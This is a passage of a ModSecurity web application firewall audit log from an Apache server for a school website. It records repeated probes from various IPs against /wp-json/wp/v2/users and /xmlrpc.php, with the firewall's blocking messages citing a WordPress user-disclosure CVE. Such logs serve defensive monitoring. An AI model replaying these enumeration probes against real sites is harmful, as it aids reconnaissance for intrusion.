Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459260664176 5438 (- - -) Stopwatch2: 1746459260664176 5438; combined=4081, p1=566, p2=3286, p3=26, p4=27, p5=101, sr=121, sw=75, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38ce9724-Z-- --57fd112c-A-- [05/May/2025:22:35:22 +0700] aBjaugRwKNFSM6B7_LabcAAAAJg 103.236.140.4 54784 103.236.140.4 8181 --57fd112c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.18 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.18 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --57fd112c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --57fd112c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459322068082 2258 (- - -) Stopwatch2: 1746459322068082 2258; combined=1265, p1=413, p2=823, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57fd112c-Z-- --14e2254a-A-- [05/May/2025:22:35:24 +0700] aBjavE2V_h1VFAgsfgZ3RgAAAAs 103.236.140.4 54808 103.236.140.4 8181 --14e2254a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.18 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.18 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --14e2254a-C-- demo.sayHello --14e2254a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --14e2254a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459324862839 6918 (- - -) Stopwatch2: 1746459324862839 6918; combined=4978, p1=676, p2=4044, p3=39, p4=52, p5=99, sr=153, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14e2254a-Z-- --c1fe652d-A-- [05/May/2025:22:35:40 +0700] aBjazIZWvR7-42f6JrAHIwAAAMg 103.236.140.4 54924 103.236.140.4 8181 --c1fe652d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.180 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c1fe652d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1fe652d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459340420766 3088 (- - -) Stopwatch2: 1746459340420766 3088; combined=1509, p1=537, p2=941, p3=0, p4=0, p5=31, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1fe652d-Z-- --24b9f27a-A-- [05/May/2025:22:35:41 +0700] aBjazYZWvR7-42f6JrAHJQAAANQ 103.236.140.4 54934 103.236.140.4 8181 --24b9f27a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --24b9f27a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --24b9f27a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459341466711 2746 (- - -) Stopwatch2: 1746459341466711 2746; combined=1222, p1=418, p2=774, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --24b9f27a-Z-- --59965a5a-A-- [05/May/2025:22:35:43 +0700] aBjazwRwKNFSM6B7_LabdQAAAJc 103.236.140.4 54956 103.236.140.4 8181 --59965a5a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.180 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --59965a5a-C-- demo.sayHello --59965a5a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --59965a5a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459343152186 4789 (- - -) Stopwatch2: 1746459343152186 4789; combined=3787, p1=476, p2=3107, p3=22, p4=23, p5=92, sr=67, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59965a5a-Z-- --3f51dd1e-A-- [05/May/2025:22:35:44 +0700] aBja0ARwKNFSM6B7_LabdgAAAIQ 103.236.140.4 54974 103.236.140.4 8181 --3f51dd1e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.28 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3f51dd1e-C-- demo.sayHello --3f51dd1e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f51dd1e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459344446472 5438 (- - -) Stopwatch2: 1746459344446472 5438; combined=4120, p1=531, p2=3364, p3=36, p4=35, p5=91, sr=81, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f51dd1e-Z-- --21c55e12-A-- [05/May/2025:22:36:12 +0700] aBja7PZJDMuQndL03JNV_QAAAFg 103.236.140.4 55214 103.236.140.4 8181 --21c55e12-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.196 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --21c55e12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21c55e12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459372546159 2933 (- - -) Stopwatch2: 1746459372546159 2933; combined=1319, p1=476, p2=815, p3=0, p4=0, p5=28, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21c55e12-Z-- --a7549d56-A-- [05/May/2025:22:36:15 +0700] aBja7_ZJDMuQndL03JNWBAAAAFc 103.236.140.4 55238 103.236.140.4 8181 --a7549d56-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.93.217 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.93.217 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a7549d56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7549d56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459375193831 2822 (- - -) Stopwatch2: 1746459375193831 2822; combined=1243, p1=441, p2=772, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7549d56-Z-- --e00bb17a-A-- [05/May/2025:22:36:15 +0700] aBja74ZWvR7-42f6JrAHNAAAAMw 103.236.140.4 55244 103.236.140.4 8181 --e00bb17a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.196 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e00bb17a-C-- demo.sayHello --e00bb17a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e00bb17a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459375625942 6153 (- - -) Stopwatch2: 1746459375625942 6153; combined=4451, p1=531, p2=3673, p3=50, p4=41, p5=92, sr=83, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e00bb17a-Z-- --60976465-A-- [05/May/2025:22:36:18 +0700] aBja8fZJDMuQndL03JNWDAAAAFE 103.236.140.4 55270 103.236.140.4 8181 --60976465-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.93.217 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.93.217 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --60976465-C-- demo.sayHello --60976465-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --60976465-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459377999488 5861 (- - -) Stopwatch2: 1746459377999488 5861; combined=4600, p1=584, p2=3786, p3=38, p4=42, p5=90, sr=70, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60976465-Z-- --0ce2513e-A-- [05/May/2025:22:37:06 +0700] aBjbIvZJDMuQndL03JNWKwAAAFc 103.236.140.4 55662 103.236.140.4 8181 --0ce2513e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0ce2513e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ce2513e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459426116147 3351 (- - -) Stopwatch2: 1746459426116147 3351; combined=1462, p1=477, p2=954, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ce2513e-Z-- --9bb3f177-A-- [05/May/2025:22:37:08 +0700] aBjbJIZWvR7-42f6JrAHRAAAAMI 103.236.140.4 55682 103.236.140.4 8181 --9bb3f177-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.223 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9bb3f177-C-- demo.sayHello --9bb3f177-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bb3f177-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459428866826 19188 (- - -) Stopwatch2: 1746459428866826 19188; combined=30222, p1=731, p2=3915, p3=38, p4=44, p5=12762, sr=131, sw=70, l=0, gc=12662 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bb3f177-Z-- --68d26f66-A-- [05/May/2025:22:37:39 +0700] aBjbQ02V_h1VFAgsfgZ3lwAAABg 103.236.140.4 55930 103.236.140.4 8181 --68d26f66-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.10 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --68d26f66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68d26f66-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459459972607 2736 (- - -) Stopwatch2: 1746459459972607 2736; combined=1264, p1=403, p2=825, p3=0, p4=0, p5=35, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68d26f66-Z-- --fdd3c25f-A-- [05/May/2025:22:37:42 +0700] aBjbRvZJDMuQndL03JNWPAAAAFI 103.236.140.4 55954 103.236.140.4 8181 --fdd3c25f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.10 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fdd3c25f-C-- demo.sayHello --fdd3c25f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fdd3c25f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459462709226 6620 (- - -) Stopwatch2: 1746459462709226 6620; combined=4857, p1=628, p2=3952, p3=45, p4=44, p5=110, sr=78, sw=78, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fdd3c25f-Z-- --0ec15b76-A-- [05/May/2025:22:37:44 +0700] aBjbSARwKNFSM6B7_LabswAAAJA 103.236.140.4 55976 103.236.140.4 8181 --0ec15b76-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.60 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.60 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0ec15b76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ec15b76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459464336206 3154 (- - -) Stopwatch2: 1746459464336206 3154; combined=1509, p1=477, p2=1000, p3=0, p4=0, p5=31, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ec15b76-Z-- --e701790c-A-- [05/May/2025:22:37:47 +0700] aBjbSwRwKNFSM6B7_LabtwAAAIQ 103.236.140.4 56002 103.236.140.4 8181 --e701790c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.60 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.60 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e701790c-C-- demo.sayHello --e701790c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e701790c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459467670765 4840 (- - -) Stopwatch2: 1746459467670765 4840; combined=3811, p1=503, p2=3002, p3=25, p4=27, p5=141, sr=68, sw=113, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e701790c-Z-- --8259d311-A-- [05/May/2025:22:38:14 +0700] aBjbZvZJDMuQndL03JNWSgAAAEo 103.236.140.4 56254 103.236.140.4 8181 --8259d311-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8259d311-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8259d311-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file 